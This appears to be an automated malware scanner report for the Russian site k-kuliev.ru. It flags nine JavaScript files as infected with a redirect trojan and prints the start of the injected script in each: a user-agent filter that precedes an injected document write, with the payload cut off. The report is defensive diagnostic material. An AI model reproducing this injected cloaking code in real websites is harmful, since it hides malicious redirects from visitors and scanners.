New scan:

Malware Scanner report for k-kuliev.ru

Malicious/Suspicious/Total urls checked
9/0/15
9 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/9
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.k-kuliev.ru/
200 OK
Content-Length: 45053
Content-Type: text/html
clean
http://www.k-kuliev.ru/media/system/js/caption.js
200 OK
Content-Length: 8172
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){documen
... 2854 bytes are skipped ...
r.appendChild(element);
if ( element.title != "" ) {
container.appendChild(text);
}
container.className = this.selector.replace('.', '_');
container.className = container.className + " " + align;
container.setAttribute("style","float:"+align);
container.style.width = width + "px";
}
});
document.caption = null;
window.addEvent('load', function() {
var caption = new JCaption('img.caption')
document.caption = caption
});

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Troj/JSRedir-OI

http://www.k-kuliev.ru/plugins/content/mavikthumbnails/highslide/highslide-with-gallery.packed.js
200 OK
Content-Length: 42966
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){documen
... 3210 bytes are skipped ...
outlines|sizingMethod|AlphaImageLoader|Microsoft|DXImageTransform|fit|important|mousewheel|DOMMouseScroll|120|eval|onmousewheel||reuse|pI|interval|caption|500|525|down|SELECT|floor|IFRAME|split|HsExpander|callee|inner|clearTimeout|preserveContent|doScroll|cellSpacing|progid|abs|addSlideshow|toElement|attachEvent|registerOverlay|htmlE|linearTween|fromElement|mouseover|button|xpand|hasHtmlExpanders|sqrt|200px|dragSensitivity|KDE|vendor|splice|firstChild|clearInterval|setInterval'.split('|'),0,{}))

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Troj/JSRedir-OI

http://www.k-kuliev.ru/templates/yoo_royalplaza/lib/js/addons/base.js
200 OK
Content-Length: 7980
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){documen
... 3168 bytes are skipped ...
|elementFx|start|body|animate|duration|elements|pixelHeight|enter|offset|offsetHeight|YOOBackgroundFx|top|padding|Math|implement|border|addEvent|width|bottom|else|elm|false|wait|Transitions|transition|initialize|Class|leaveFx|Options|YOOMorph|leave|window|document|ie6|timer|setStyle|linear|9000|999999|FFFFFF|effects|Element|length|expoOut|periodical|getElementsBySelector|return|Styles|undefined|mouseleave|mouseenter|contains|background|500|px|matchHeight|null|color|chk|YOOBase'.split('|'),0,{}))

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Troj/JSRedir-OI

http://www.k-kuliev.ru/templates/yoo_royalplaza/lib/js/addons/accordionmenu.js
200 OK
Content-Length: 7560
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){documen
... 2736 bytes are skipped ...
.v(0))}});x.G(7 T);',61,61,'this||tog|options|function|active|var|new|togs|show|display|elms|span|if|fx|Fx|getFirst|each||togglers|getElement|removeClass|addClass|elements|ES|default|createSlide|accordion|createDefault|defined|ul|bind|toggleClass|YOOAccordionMenu|hasClass|chain|switch|case|slide|break|Class|initialize|implement|onBackground|toggle|setOptions|onActive|addEvent|250|all|duration|linear|Transitions|click|extend|Options|transition|hide|accordionMenu|Accordion|Slide'.split('|'),0,{}))

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Troj/JSRedir-OI

http://www.k-kuliev.ru/templates/yoo_royalplaza/lib/js/addons/fancymenu.js
200 OK
Content-Length: 8876
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){documen
... 4056 bytes are skipped ...
|empty|fadeFx|duration|getElement|return|index|moveFx|css|activeSelector|itemSelector|dropdownSelector|leaveevent|addClass|active|effects|onEnterItem|slide|fade|switch|default|fireEvent|YOOFancyMenu|slideOffset|onLeaveItem|mouseleaveItem|dur|clickItem|onClick|mouseenterItem|visibility|dropdown|getElements|each|level1|Transitions|implement|500|wait|Events|Fx|30|mouseleave|transition|visible|Event|initialize|sineInOut|injectInside|Options|click|mouseenter|setStyles|dropdownleave'.split('|'),0,{}))

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Troj/JSRedir-OI

http://www.k-kuliev.ru/templates/yoo_royalplaza/lib/js/addons/dropdownmenu.js
200 OK
Content-Length: 9033
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){documen
... 4226 bytes are skipped ...
t|remainTime|false|itemSelector||relatedTarget|case|window|injectInside|attachSlideFx|attachDefaultFx|YOODropdownMenu|include|else|break|getStyles|max|dropdownleave|addEvent|Math|bind|li|hasClass|chain|margin|getElement|delaytime|wait|linear|return|matchUlHeight|addClass|Transitions|null|600|setOptions|initialize|Class|default|ul|800|box4|duration|transition|opera|removeClass|switch|delay|extend|ie|Options|clear|implement|matchHeight|getParent|slide|true|level2|Events|hasChild'.split('|'),0,{}))

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Troj/JSRedir-OI

http://www.k-kuliev.ru/templates/yoo_royalplaza/lib/js/template.js
200 OK
Content-Length: 8809
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){documen
... 3999 bytes are skipped ...
.matchHeight('#bottom2 div.bottombox div.deepest', 20);
YOOBase.matchHeight('div.maintopbox div.deepest', 20);
YOOBase.matchHeight('div.mainbottombox div.deepest', 20);
YOOBase.matchHeight('div.contenttopbox div.deepest', 20);
YOOBase.matchHeight('div.contentbottombox div.deepest', 20);
YOOBase.matchHeight('#left, #right, #contentleft, #contentright', 20);
}

}

};


window.addEvent('domready', YOOTemplate.start);

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Troj/JSRedir-OI

http://www.k-kuliev.ru/plugins/content/s5_mp3_player/s5_mp3_player.js
200 OK
Content-Length: 6920
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){documen
... 2025 bytes are skipped ...
r/>function registerMP3Player(playerID,autostart){
arMP3Players.push(playerID);
if(autostart == "1" && !bMP3PlayerStarted){
bMP3PlayerStarted = true;
setTimeout("document.getElementById('"+playerID+"').autostart()",100);
}
}

function stopMP3Players(playerID){
for(i=0;i<arMP3Players.length;i++){
if(playerID != arMP3Players[i]){
document.getElementById(arMP3Players[i]).stopPlayer();
}
}
}


Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Troj/JSRedir-OI

http://www.k-kuliev.ru/biography/autobiography.html
200 OK
Content-Length: 50723
Content-Type: text/html
clean
http://www.k-kuliev.ru/biography/nagr.html
200 OK
Content-Length: 74534
Content-Type: text/html
clean
http://www.k-kuliev.ru/biography/pam.html
200 OK
Content-Length: 45162
Content-Type: text/html
clean
http://www.k-kuliev.ru/plugins/content/yoo_gallery/lib/lightbox/slimbox_packed.js
200 OK
Content-Length: 10426
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){documen
... 3298 bytes are skipped ...
n O(){if(H){H=0;N.onload=Class.empty;for(var e in E){E[e].stop()}$$(b,a).setStyle("display","none");E.overlay.chain(R).start(0)}return false}})();
Slimbox.scanPage = function() {
var links = $$("a").filter(function(el) {
return el.rel && el.rel.test(/^lightbox/i);
});
$$(links).slimbox({}, null, function(el) {
return (this == el) || ((this.rel.length > 8) && (this.rel == el.rel));
});
};
window.addEvent("domready", Slimbox.scanPage);

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Troj/JSRedir-OI

http://www.k-kuliev.ru/poem/sobr1.html
200 OK
Content-Length: 66305
Content-Type: text/html
clean
http://www.k-kuliev.ru/poem/sobr2.html
200 OK
Content-Length: 101837
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: k-kuliev.ru

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: k-kuliev.ru
Referer: http://www.google.com/search?q=k-kuliev.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=k-kuliev.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://k-kuliev.ru/

Result: k-kuliev.ru is not infected or malware details are not published yet.